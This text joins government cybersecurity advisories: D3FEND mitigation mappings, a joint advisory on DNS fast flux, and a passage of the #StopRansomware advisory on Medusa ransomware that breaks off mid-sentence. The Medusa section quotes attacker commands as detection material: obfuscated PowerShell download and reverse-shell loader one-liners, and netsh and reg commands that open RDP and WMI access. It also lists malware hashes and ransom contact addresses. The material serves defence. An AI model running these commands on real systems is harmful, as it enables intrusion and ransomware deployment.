Reputation Analysis D3-URA Use services that provide enhanced browsing services and safe link checking. Network Access Mediation D3-NAM Do not allow incoming traffic, especially logins to systems, from public VPN services. Where possible, logins from public VPNs, including exit nodes in the same country as target systems, should be blocked or, if allowed, alerted on for further investigation. Ensure cameras and other Internet of Things devices are protected by a security appliance, if possible. DNS Denylisting D3-DNSDL Do not allow outgoing traffic to hosting and API mocking services frequently used by malicious actors. Domain Name Reputation Analysis D3-DNRA Heuristic detections for web requests to new subdomains may uncover malicious phishing activity. Logging the requests for each sub-domain requested by users on a network, such as in DNS or firewall logs, may enable system administrators to identify new targeting and victims. Multi-factor Authentication D3-MFA Use MFA with strong factors and require regular re-authentication, especially for management accounts. Job Function Access Pattern Analysis D3-JFAPA Implement other mitigations for privileged accounts: including limiting the number of admin accounts, considering using hardware MFA tokens, and regularly reviewing all privileged user accounts. User Account Permissions D3-UAP Separate privileged accounts by role and alert on misuse of privileged accounts. Audit user accounts on all devices to ensure they are an accurate reflection of your organization and that they are being used as expected. Token-based Authentication D3-TBA Reduce reliance on passwords; instead, consider using services like single sign-on. Credential Hardening D3-CH Do not store passwords in Group Policy Preferences (GPP). Remove all passwords previously included in GPP and change all passwords on the corresponding accounts. Authentication Event Threshholding D3-ANET Use account throttling or account lockout. Throttling progressively increases time delay between successive login attempts. If using account lockout, allow between 5 to 10 attempts before lockout. Strong Password Policy D3-SPP Use a service to check for compromised passwords before using them. Credential Rotation D3-CRO Change all default credentials. Encrypted Tunnels D3-ET Disable protocols that use weak authentication (e.g., clear-text passwords, or outdated and vulnerable authentication or encryption protocols). Use a VPN for remote connections to devices. Software Update D3-SU Apply security patches and firmware updates to all devices. Ensure devices are currently supported. Replace devices that are end-of-life. Agent Authentication D3-AA Ensure authentication is enabled for remote access to devices. If supported on IP cameras, enable authenticated RTSP access only. User Behavior Analysis D3-UBA Review all authentication activity for remote access to make sure it is valid and expected. Investigate any unexpected or unusual activity.

Executive summary Many networks have a gap in their defenses for detecting and blocking a malicious technique known as “fast flux.” This technique poses a significant threat to national security, enabling malicious cyber actors to consistently evade detection. Malicious cyber actors, including cybercriminals and nation-state actors, use fast flux to obfuscate the locations of malicious servers by rapidly changing Domain Name System (DNS) records. Additionally, they can create resilient, highly available command and control (C2) infrastructure, concealing their subsequent malicious operations. This resilient and fast changing infrastructure makes tracking and blocking malicious activities that use fast flux more difficult. The National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), Canadian Centre for Cyber Security (CCCS), and New Zealand National Cyber Security Centre (NCSC-NZ) are releasing this joint cybersecurity advisory (CSA) to warn organizations, Internet service providers (ISPs), and cybersecurity service providers of the ongoing threat of fast flux enabled malicious activities as a defensive gap in many networks. This advisory is meant to encourage service providers, especially Protective DNS (PDNS) providers, to help mitigate this threat by taking proactive steps to develop accurate, reliable, and timely fast flux detection analytics and blocking capabilities for their customers. This CSA also provides guidance on detecting and mitigating elements of malicious fast flux by adopting a multi-layered approach that combines DNS analysis, network monitoring, and threat intelligence. The authoring agencies recommend all stakeholders—government and providers—collaborate to develop and implement scalable solutions to close this ongoing gap in network defenses against malicious fast flux activity. Download the PDF version of this report: Fast Flux: A National Security Threat (PDF, 841 KB). Technical details When malicious cyber actors compromise devices and networks, the malware they use needs to “call home” to send status updates and receive further instructions. To decrease the risk of detection by network defenders, malicious cyber actors use dynamic resolution techniques, such as fast flux, so their communications are less likely to be detected as malicious and blocked. Fast flux refers to a domain-based technique that is characterized by rapidly changing the DNS records (e.g., IP addresses) associated with a single domain [T1568.001]. Single and double flux Malicious cyber actors use two common variants of fast flux to perform operations: 1. Single flux: A single domain name is linked to numerous IP addresses, which are frequently rotated in DNS responses. This setup ensures that if one IP address is blocked or taken down, the domain remains accessible through the other IP addresses. See Figure 1 as an example to illustrate this technique. Figure 1: Single flux technique. Note: This behavior can also be used for legitimate purposes for performance reasons in dynamic hosting environments, such as in content delivery networks and load balancers. 2. Double flux: In addition to rapidly changing the IP addresses as in single flux, the DNS name servers responsible for resolving the domain also change frequently. This provides an additional layer of redundancy and anonymity for malicious domains. Double flux techniques have been observed using both Name Server (NS) and Canonical Name (CNAME) DNS records. See Figure 2 as an example to illustrate this technique. Figure 2: Double flux technique. Both techniques leverage a large number of compromised hosts, usually as a botnet from across the Internet that acts as proxies or relay points, making it difficult for network defenders to identify the malicious traffic and block or perform legal enforcement takedowns of the malicious infrastructure. Numerous malicious cyber actors have been reported using the fast flux technique to hide C2 channels and remain operational. Examples include: Bulletproof hosting (BPH) services offer Internet hosting that disregards or evades law enforcement requests and abuse notices. These providers host malicious content and activities while providing anonymity for malicious cyber actors. Some BPH companies also provide fast flux services, which help malicious cyber actors maintain connectivity and improve the reliability of their malicious infrastructure. [1] Refer to ASD’s ACSC’s “Bulletproof” hosting providers: Cracks in the armour of cybercriminal infrastructure for more information on BPH providers. [2] Fast flux has been used in Hive and Nefilim ransomware attacks. [3], [4] Gamaredon uses fast flux to limit the effectiveness of IP blocking. [5], [6], [7] The key advantages of fast flux networks for malicious cyber actors include: Increased resilience. As a fast flux network rapidly rotates through botnet devices, it is difficult for law enforcement or abuse notifications to process the changes quickly and disrupt their services. Render IP blocking ineffective. The rapid turnover of IP addresses renders IP blocking irrelevant since each IP address is no longer in use by the time it is blocked. This allows criminals to maintain resilient operations. Anonymity. Investigators face challenges in tracing malicious content back to the source through fast flux networks. This is because malicious cyber actors’ C2 botnets are constantly changing the associated IP addresses throughout the investigation. Additional malicious uses Fast flux is not only used for maintaining C2 communications, it also can play a significant role in phishing campaigns to make social engineering websites harder to block or take down. Phishing is often the first step in a larger and more complex cyber compromise. Phishing is typically used to trick victims into revealing sensitive information (such as login passwords, credit card numbers, and personal data), but can also be used to distribute malware or exploit system vulnerabilities. Similarly, fast flux is used for maintaining high availability for cybercriminal forums and marketplaces, making them resilient against law enforcement takedown efforts. Some BPH providers promote fast flux as a service differentiator that increases the effectiveness of their clients’ malicious activities. For example, one BPH provider posted on a dark web forum that it protects clients from being added to Spamhaus blocklists by easily enabling the fast flux capability through the service management panel (See Figure 3). A customer just needs to add a "dummy server interface," which redirects incoming queries to the host server automatically. By doing so, only the dummy server interfaces are reported for abuse and added to the Spamhaus blocklist, while the servers of the BPH customers remain "clean" and unblocked. Figure 3: Example dark web fast flux advertisement. The BPH provider further explained that numerous malicious activities beyond C2, including botnet managers, fake shops, credential stealers, viruses, spam mailers, and others, could use fast flux to avoid identification and blocking. As another example, a BPH provider that offers fast flux as a service advertised that it automatically updates name servers to prevent the blocking of customer domains. Additionally, this provider further promoted its use of separate pools of IP addresses for each customer, offering globally dispersed domain registrations for increased reliability. Detection techniques The authoring agencies recommend that ISPs and cybersecurity service providers, especially PDNS providers, implement a multi-layered approach, in coordination with customers, using the following techniques to aid in detecting fast flux activity [CISA CPG 3.A]. However, quickly detecting malicious fast flux activity and differentiating it from legitimate activity remains an ongoing challenge to developing accurate, reliable, and timely fast flux detection analytics. 1. Leverage threat intelligence feeds and reputation services to identify known fast flux domains and associated IP addresses, such as in boundary firewalls, DNS resolvers, and/or SIEM solutions. 2. Implement anomaly detection systems for DNS query logs to identify domains exhibiting high entropy or IP diversity in DNS responses and frequent IP address rotations. Fast flux domains will frequently cycle though tens or hundreds of IP addresses per day. 3. Analyze the time-to-live (TTL) values in DNS records. Fast flux domains often have unusually low TTL values. A typical fast flux domain may change its IP address every 3 to 5 minutes. 4. Review DNS resolution for inconsistent geolocation. Malicious domains associated with fast flux typically generate high volumes of traffic with inconsistent IP-geolocation information. 5. Use flow data to identify large-scale communications with numerous different IP addresses over short periods. 6. Develop fast flux detection algorithms to identify anomalous traffic patterns that deviate from usual network DNS behavior. 7. Monitor for signs of phishing activities, such as suspicious emails, websites, or links, and correlate these with fast flux activity. Fast flux may be used to rapidly spread phishing campaigns and to keep phishing websites online despite blocking attempts. 8. Implement customer transparency and share information about detected fast flux activity, ensuring to alert customers promptly after confirmed presence of malicious activity. Mitigations All organizations To defend against fast flux, government and critical infrastructure organizations should coordinate with their Internet service providers, cybersecurity service providers, and/or their Protective DNS services to implement the following mitigations utilizing accurate, reliable, and timely fast flux detection analytics. Note: Some legitimate activity, such as common content delivery network (CDN) behaviors, may look like malicious fast flux activity. Protective DNS services, service providers, and network defenders should make reasonable efforts, such as allowlisting expected CDN services, to avoid blocking or impeding legitimate content. 1. DNS and IP blocking and sinkholing of malicious fast flux domains and IP addresses Block access to domains identified as using fast flux through non-routable DNS responses or firewall rules. Consider sinkholing the malicious domains, redirecting traffic from those domains to a controlled server to capture and analyze the traffic, helping to identify compromised hosts within the network. Block IP addresses known to be associated with malicious fast flux networks. 2. Reputational filtering of fast flux enabled malicious activity Block traffic to and from domains or IP addresses with poor reputations, especially ones identified as participating in malicious fast flux activity. 3. Enhanced monitoring and logging Increase logging and monitoring of DNS traffic and network communications to identify new or ongoing fast flux activities. Implement automated alerting mechanisms to respond swiftly to detected fast flux patterns. Refer to ASD’s ACSC joint publication, Best practices for event logging and threat detection, for further logging recommendations. 4. Collaborative defense and information sharing Share detected fast flux indicators (e.g., domains, IP addresses) with trusted partners and threat intelligence communities to enhance collective defense efforts. Examples of indicator sharing initiatives include CISA’s Automated Indicator Sharing or sector-based Information Sharing and Analysis Centers (ISACs) and ASD’s Cyber Threat Intelligence Sharing Platform (CTIS) in Australia. Participate in public and private information-sharing programs to stay informed about emerging fast flux tactics, techniques, and procedures (TTPs). Regular collaboration is particularly important because most malicious activity by these domains occurs within just a few days of their initial use; therefore, early discovery and information sharing by the cybersecurity community is crucial to minimizing such malicious activity. [8] 5. Phishing awareness and training Implement employee awareness and training programs to help personnel identify and respond appropriately to phishing attempts. Develop policies and procedures to manage and contain phishing incidents, particularly those facilitated by fast flux networks. For more information on mitigating phishing, see joint Phishing Guidance: Stopping the Attack Cycle at Phase One. Network defenders The authoring agencies encourage organizations to use cybersecurity and PDNS services that detect and block fast flux. By leveraging providers that detect fast flux and implement capabilities for DNS and IP blocking, sinkholing, reputational filtering, enhanced monitoring, logging, and collaborative defense of malicious fast flux domains and IP addresses, organizations can mitigate many risks associated with fast flux and maintain a more secure environment. However, some PDNS providers may not detect and block malicious fast flux activities. Organizations should not assume that their PDNS providers block malicious fast flux activity automatically and should contact their PDNS providers to validate coverage of this specific cyber threat. For more information on PDNS services, see the 2021 joint cybersecurity information sheet from NSA and CISA about Selecting a Protective DNS Service. [9] In addition, NSA offers no-cost cybersecurity services to Defense Industrial Base (DIB) companies, including a PDNS service. For more information, see NSA’s DIB Cybersecurity Services and factsheet. CISA also offers a Protective DNS service for federal civilian executive branch (FCEB) agencies. See CISA’s Protective Domain Name System Resolver page and factsheet for more information. Conclusion Fast flux represents a persistent threat to network security, leveraging rapidly changing infrastructure to obfuscate malicious activity. By implementing robust detection and mitigation strategies, organizations can significantly reduce their risk of compromise by fast flux-enabled threats. The authoring agencies strongly recommend organizations engage their cybersecurity providers on developing a multi-layered approach to detect and mitigate malicious fast flux operations. Utilizing services that detect and block fast flux enabled malicious cyber activity can significantly bolster an organization's cyber defenses. Works cited [1] Intel471. Bulletproof Hosting: A Critical Cybercriminal Service. 2024. https://intel471.com/blog/bulletproof-hosting-a-critical-cybercriminal-service [2] Australian Signals Directorate’s Australian Cyber Security Centre. "Bulletproof" hosting providers: Cracks in the armour of cybercriminal infrastructure. 2025. https://www.cyber.gov.au/about-us/view-all-content/publications/bulletproof-hosting-providers [3] Logpoint. A Comprehensive guide to Detect Ransomware. 2023. https://www.logpoint.com/wp-content/uploads/2023/04/logpoint-a-comprehensive-guide-to-detect-ransomware.pdf [4] Trendmicro. Modern Ransomware’s Double Extortion Tactic’s and How to Protect Enterprises Against Them. 2021. https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/modern-ransomwares-double-extortion-tactics-and-how-to-protect-enterprises-against-them [5] Unit 42. Russia’s Trident Ursa (aka Gamaredon APT) Cyber Conflict Operations Unwavering Since Invasion of Ukraine. 2022. https://unit42.paloaltonetworks.com/trident-ursa/ [6] Recorded Future. BlueAlpha Abuses Cloudflare Tunneling Service for GammaDrop Staging Infrastructure. 2024. https://www.recordedfuture.com/research/bluealpha-abuses-cloudflare-tunneling-service [7] Silent Push. 'From Russia with a 71': Uncovering Gamaredon's fast flux infrastructure. New apex domains and ASN/IP diversity patterns discovered. 2023. https://www.silentpush.com/blog/from-russia-with-a-71/ [8] DNS Filter. Security Categories You Should be Blocking (But Probably Aren’t). 2023. https://www.dnsfilter.com/blog/security-categories-you-should-be-blocking-but-probably-arent [9] National Security Agency. Selecting a Protective DNS Service. 2021. https://media.defense.gov/2025/Mar/24/2003675043/-1/-1/0/CSI-SELECTING-A-PROTECTIVE-DNS-SERVICE-V1.3.PDF Disclaimer of endorsement The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial product, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes. Purpose This document was developed in furtherance of the authoring cybersecurity agencies’ missions, including their responsibilities to identify and disseminate threats, and develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. Contact National Security Agency (NSA): Cybersecurity Report Feedback: CybersecurityReports@nsa.gov Defense Industrial Base Inquiries and Cybersecurity Services: DIB_Defense@cyber.nsa.gov Media Inquiries / Press Desk: NSA Media Relations: 443-634-0721, MediaRelations@nsa.gov Cybersecurity and Infrastructure Security Agency (CISA): All organizations should report incidents and anomalous activity to CISA via the agency’s Incident Reporting System, its 24/7 Operations Center at report@cisa.gov, or by calling 1-844-Say-CISA (1-844-729-2472). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment user for the activity; the name of the submitting company or organization; and a designated point of contact. Federal Bureau of Investigation (FBI): To report suspicious or criminal activity related to information found in this advisory, contact your local FBI field office or the FBI’s Internet Crime Complaint Center (IC3). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC): For inquiries, visit ASD’s website at www.cyber.gov.au or call the Australian Cyber Security Hotline at 1300 CYBER1 (1300 292 371). Canadian Centre for Cyber Security (CCCS): CCCS supports Canadian organizations. Visit www.cyber.gc.ca for publications and guidance or contact CCCS via 1-833-CYBER-88 or email contact@cyber.gc.ca. New Zealand National Cyber Security Centre (NCSC-NZ): The NCSC-NZ assists New Zealand organizations. Visit www.ncsc.govt.nz for guidance and resources, or email NCSC-NZ at info@ncsc.govt.nz.

Summary Note: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders detailing various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources. The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint advisory to disseminate known Medusa ransomware TTPs and IOCs, identified through FBI investigations as recently as February 2025. Medusa is a ransomware-as-a-service (RaaS) variant first identified in June 2021. As of February 2025, Medusa developers and affiliates have impacted over 300 victims from a variety of critical infrastructure sectors with affected industries including medical, education, legal, insurance, technology, and manufacturing. The Medusa ransomware variant is unrelated to the MedusaLocker variant and the Medusa mobile malware variant per the FBI’s investigation. FBI, CISA, and MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of Medusa ransomware incidents. Download the PDF version of this report: AA25-071A #StopRansomware: Medusa Ransomware (PDF, 672.45 KB ) For a downloadable list of IOCs, see: AA25-071A STIX XML (XML, 34.30 KB ) AA25-071A STIX JSON (JSON, 42.28 KB ) Technical Details Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 16. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. Background The RaaS Medusa variant has been used to conduct ransomware attacks from 2021 to present. Medusa originally operated as a closed ransomware variant, meaning all development and associated operations were controlled by the same group of cyber threat actors. While Medusa has since progressed to using an affiliate model, important operations such as ransom negotiation are still centrally controlled by the developers. Both Medusa developers and affiliates—referred to as “Medusa actors” in this advisory—employ a double extortion model, where they encrypt victim data and threaten to publicly release exfiltrated data if a ransom is not paid. Initial Access Medusa developers typically recruit initial access brokers (IABs) in cybercriminal forums and marketplaces to obtain initial access [TA0001] to potential victims. Potential payments between $100 USD and $1 million USD are offered to these affiliates with the opportunity to work exclusively for Medusa. Medusa IABs (affiliates) are known to make use of common techniques, such as: Phishing campaigns as a primary method for stealing victim credentials [T1566]. Exploitation of unpatched software vulnerabilities [T1190] through Common Vulnerabilities and Exposures (CVEs) such as the ScreenConnect vulnerability CVE-2024-1709 [CWE-288: Authentication Bypass Using an Alternate Path or Channel] and Fortinet EMS SQL injection vulnerability [CVE-2023-48788 [CWE 89: SQL Injection]. Discovery Medusa actors use living off the land (LOTL) and legitimate tools Advanced IP Scanner and SoftPerfect Network Scanner for initial user, system, and network enumeration. Once a foothold in a victim network is established, commonly scanned ports include: 21 (FTP) 22 (SSH) 23 (Telnet) 80 (HTTP) 115 (SFTP) 443 (HTTPS) 1433 (SQL database) 3050 (Firebird database) 3128 (HTTP web proxy) 3306 (MySQL database) 3389 (RDP) Medusa actors primarily use PowerShell [T1059.001] and the Windows Command Prompt (cmd.exe) [T1059.003] for network [T1046] and filesystem enumeration [T1083] and to utilize Ingress Tool Transfer capabilities [T1105]. Medusa actors use Windows Management Instrumentation (WMI) [T1047] for querying system information. Defense Evasion Medusa actors use LOTL to avoid detection [TA0005]. (See Appendix A for associated shell commands observed during FBI investigations of Medusa victims.) Certutil (certutil.exe) is used to avoid detection when performing file ingress. Actors have been observed using several different PowerShell detection evasion techniques with increasing complexity, which are provided below. Additionally, Medusa actors attempt to cover their tracks by deleting the PowerShell command line history [T1070.003]. In this example, Medusa actors use a well-known evasion technique that executes a base64 encrypted command [T1027.013] using specific execution settings. powershell -exec bypass -enc In another example, the DownloadFile string is obfuscated by slicing it into pieces and referencing it via a variable [T1027]. powershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$x.Invoke(http:///.msi) In the final example, the payload is an obfuscated base64 string read into memory, decompressed from gzip, and used to create a scriptblock. The base64 payload is split using empty strings and concatenation, and uses a format operator (-f) followed by three arguments to specify character replacements in the base64 payload. powershell -nop -w hidden -noni -ep bypass &([scriptblock]::create(( New-Object System.IO.StreamReader( New-Object System.IO.Compression.GzipStream(( New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String( (('')-f'','', '')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) The obfuscated base64 PowerShell payload is identical to powerfun.ps1, a publicly available stager script that can create either a reverse or bind shell over TLS to load additional modules. In the bind shell, the script awaits a connection on local port 443 [T1071.001], and initiates a connection to a remote port 443 in the reverse shell. In some instances, Medusa actors attempted to use vulnerable or signed drivers to kill or delete endpoint detection and response (EDR) tools [T1562.001]. FBI has observed Medusa actors using the following tools to support command and control (C2) and evade detection: Ligolo. A reverse tunneling tool often used to create secure connections between a compromised host and threat actor’s machine. Cloudflared. Formerly known as ArgoTunnel. Used to securely expose applications, services, or servers to the internet via Cloudflare Tunnel without exposing them directly. Lateral Movement and Execution Medusa actors use a variety of legitimate remote access software [T1219]; they may tailor their choice based on any remote access tools already present in the victim environment as a means of evading detection. Investigations identified Medusa actors using remote access software AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Deploy, PDQ Inventory, SimpleHelp, and Splashtop. Medusa uses these tools—in combination with Remote Desktop Protocol (RDP) [T1021.001] and PsExec [T1569.002]—to move laterally [TA0008] through the network and identify files for exfiltration [TA0010] and encryption [T1486]. When provided with valid username and password credentials, Medusa actors use PsExec to: Copy (-c) one script from various batch scripts on the current machine to the remote machine and execute it with SYSTEM level privileges (-s). Execute an already existing local file on a remote machine with SYSTEM level privileges. Execute remote shell commands using cmd /c. One of the batch scripts executed by PsExec is openrdp.bat, which first creates a new firewall rule to allow inbound TCP traffic on port 3389: netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow Then, a rule to allow remote WMI connections is created: netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes Finally, the registry is modified to allow Remote Desktop connections: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f Mimikatz has also been observed in use for Local Security Authority Subsystem Service (LSASS) dumping [T1003.001] to harvest credentials [TA0006] and aid lateral movement. Exfiltration and Encryption Medusa actors install and use Rclone to facilitate exfiltration of data to the Medusa C2 servers [T1567.002] used by actors and affiliates. The actors use Sysinternals PsExec, PDQ Deploy, or BigFix [T1072] to deploy the encryptor, gaze.exe, on files across the network—with the actors disabling Windows Defender and other antivirus services on specific targets. Encrypted files have a .medusa file extension. The process gaze.exe terminates all services [T1489] related to backups, security, databases, communication, file sharing and websites, then deletes shadow copies [T1490] and encrypts files with AES-256 before dropping the ransom note. The actors then manually turn off [T1529] and encrypt virtual machines and delete their previously installed tools [T1070]. Extortion Medusa RaaS employs a double extortion model, where victims must pay [T1657] to decrypt files and prevent further release. The ransom note demands victims make contact within 48 hours via either a Tor browser based live chat, or via Tox, an end-to-end encrypted instant-messaging platform. If the victim does not respond to the ransom note, Medusa actors will reach out to them directly by phone or email. Medusa operates a .onion data leak site, divulging victims alongside countdowns to the release of information. Ransom demands are posted on the site, with direct hyperlinks to Medusa affiliated cryptocurrency wallets. At this stage, Medusa concurrently advertises sale of the data to interested parties before the countdown timer ends. Victims can additionally pay $10,000 USD in cryptocurrency to add a day to the countdown timer. FBI investigations identified that after paying the ransom, one victim was contacted by a separate Medusa actor who claimed the negotiator had stolen the ransom amount already paid and requested half of the payment be made again to provide the “true decryptor”— potentially indicating a triple extortion scheme. Indicators of Compromise Table 1 lists the hashes of malicious files obtained during investigations. Table 1: Malicious Files Files Hash (MD5) Description !!!READ_ME_MEDUSA!!!.txt Redacted Ransom note file openrdp.bat 44370f5c977e415981febf7dbb87a85c Allows incoming RDP and remote WMI connections pu.exe 80d852cd199ac923205b61658a9ec5bc Reverse shell Table 2 includes email addresses used by Medusa actors to extort victims; they are exclusively used for ransom negotiation and contacting victims following compromise. These email addresses are not associated with phishing activity conducted by Medusa actors. Table 2: Medusa Email Addresses Email Addresses Description key.medusa.serviceteam@protonmail.com Used for ransom negotiation medusa.support@onionmail.org Used for ransom negotiation mds.svt.breach@protonmail.com Used for ransom negotiation mds.svt.mir2@protonmail.com Used for ransom negotiation MedusaSupport@cock.li Used for ransom negotiation MITRE ATT&CK Tactics and Techniques See Table 3 – Table 11 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. Table 3: Initial Access Technique Title ID Use Exploit Public-Facing Application T1190 Medusa actors exploited unpatched software or n-day vulnerabilities through common vulnerabilities and exposures. Initial Access TA0001 Medusa actors recruited initial access brokers (IABS) in cybercriminal forums and marketplaces to obtain initial access. Phishing T1566 Medusa IABS used phishing campaigns as a primary method for delivering ransomware to victims. Table 4: Defense Evasion Technique Title ID Use Indicator Removal: Clear Command History T1070.003 Medusa actors attempt to cover their tracks by deleting the PowerShell command line history. Obfuscated Files or Information: Encrypted/Encoded File T1027.013 Medusa actors use a well-known evasion technique that executes a base64 encrypted command. Obfuscated Files or Information T1027 Medusa actors obfuscated a string by slicing it into pieces and referencing it via a variable. Indicator Removal T1070 Medusa actors deleted their previous work and tools installed. Impair Defenses: Disable or Modify Tools T1562.001 Medusa actors killed or deleted endpoint detection and response tools. Table 5: Discovery Technique Title ID Use Network Service Discovery T1046 Medusa actors utilized living of the land techniques to perform network enumeration. File and Directory Discovery T1083 Medusa actors utilized Windows Command Prompt for filesystem enumeration. Network Share Discovery T1135 Medusa actors queried shared drives on the local system to gather sources of information. System Network Configuration Discovery T1016 Medusa actors used operating system administrative utilities to gather network information. System Information Discovery T1082 Medusa actors used the command systeminfo to gather detailed system information. Permission Groups Discovery: Domain Groups T1069.002 Medusa actors attempt to find domain-level group and permission settings. Table 6: Credential Access Technique Title ID Use Credential Access TA0006 Medusa actors harvest credentials with tools like Mimikatz to gain access to systems. OS Credential Dumping: LSASS Memory T1003.001 Medusa actors were observed accessing credential material stored in process memory or Local Security Authority Subsystem Service (LSASS) using Mimkatz. Table 7: Lateral Movement and Execution Technique Title ID Use Lateral Movement TA0008 Medusa actors performed techniques to move laterally without detection once they gained initial access. Command and Scripting Interpreter: PowerShell T1059.001 Medusa actors used PowerShell, a powerful interactive command-line interface and scripting environment for ingress, network, and filesystem enumeration. Command and Scripting Interpreter: Windows Command Shell T1059.003 Medusa actors used Windows Command Prompt—which can be used to control almost any aspect of a system—for ingress, network, and filesystem enumeration. Software Deployment Tools T1072 Medusa Actors used PDQ Deploy and BigFix to deploy the encryptor on files across the network. Remote Services: Remote Desktop Protocol T1021.001 Medusa actors used Remote Desktop Protocol (RDP), a common feature in operating systems, to log into an interactive session with a system and move laterally. System Services T1569.002 Medusa actors used Sysinternals PsExec to deploy the encryptor on files across the network. Windows Management Instrumentation T1047 Medusa actors abused Windows Management Instrumentation to query system information. Table 8: Exfiltration and Encryption Technique Title ID Use Exfiltration TA0010 Medusa actors identified files to exfiltrate out of victim networks. Exfiltration Over Web Service: Exfiltration to Cloud Storage T1567.002 Medusa actors used Rclone to facilitate exfiltration of data to the Medusa C2 servers. Table 9: Command and Control Technique Title ID Use Ingress Tool Transfer T1105 Medusa actors used PowerShell, Windows Command Prompt, and certutil for file ingress. Application Layer Protocol: Web Protocols T1071.001 Medusa actors communicate using application layer protocols associated with web traffic. In this case, Medusa actors used scripts that created reverse or bind shells over port 443: HTTPS. Remote Access Software T1219 Medusa actors used remote access software to move laterally through the network. Table 10: Persistence Technique Title ID Use Create Account T1136.002 Medusa actors created a domain account to maintain access to victim systems. Table 11: Impact Technique Title ID Use Data Encrypted for Impact T1486 Medusa identified and encrypted data on target systems to interrupt availability to system and network resources. Inhibit System Recovery T1490 The process gaze.exe terminates all services then deletes shadow copies and encrypts files with AES-256 before dropping the ransom note. Financial Theft T1657 Victims must pay to decrypt files and prevent further release by Medusa actors. System Shutdown/Reboot T1529 Medusa actors manually turned off and encrypted virtual machines. Service Stop T1489 The process gaze.exe terminates all services related to backups, security, databases, communication, file sharing, and websites, Mitigations FBI, CISA, and MS-ISAC recommend organizations implement the mitigations below to improve cybersecurity posture based on threat actors’ activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s CPGs webpage for more information on the CPGs, including additional recommended baseline protections. Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, the cloud) [CPG 2.F, 2.R, 2.S]. Require all accounts with password logins (e.g., service accounts, admin accounts, and domain admin accounts) to comply with NIST’s standards. In particular, require employees to use long passwords and consider not requiring frequently recurring password changes, as these can weaken security [CPG 2.C]. Require multifactor authentication for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems [CPG 2.H]. Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E]. Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement [CPG 2.F]. Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [CPG 3.A]. Require VPNs or Jump Hosts for remote access. Monitor for unauthorized scanning and access attempts. Filter network traffic by preventing unknown or untrusted origins from accessing remote services on internal systems. This prevents threat actors from directly connecting to remote access services that they have established for persistence. Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege [CPG 2.E]. Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts [CPG 1.A, 2.O]. Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally [CPG 2.E, 2.N]. Disable unused ports[CPG 2.V]. Maintain offline backups of data, and regularly maintain backup and restoration [CPG 2.R]. By instituting this practice, the organization helps ensure they will not be severely interrupted and/or only have irretrievable data. Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.K, 2.L, 2.R]. Validate Security Controls In addition to applying mitigations, the FBI, CISA, and MS-ISAC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK Matrix for Enterprise framework in this advisory. The FBI, CISA, and MS-ISAC recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory. To get started: Select an ATT&CK technique described in this advisory (Table 3 to Table 11). Align your security technologies against the technique. Test your technologies against the technique. Analyze your detection and prevention technologies’ performance. Repeat the process for all security technologies to obtain a set 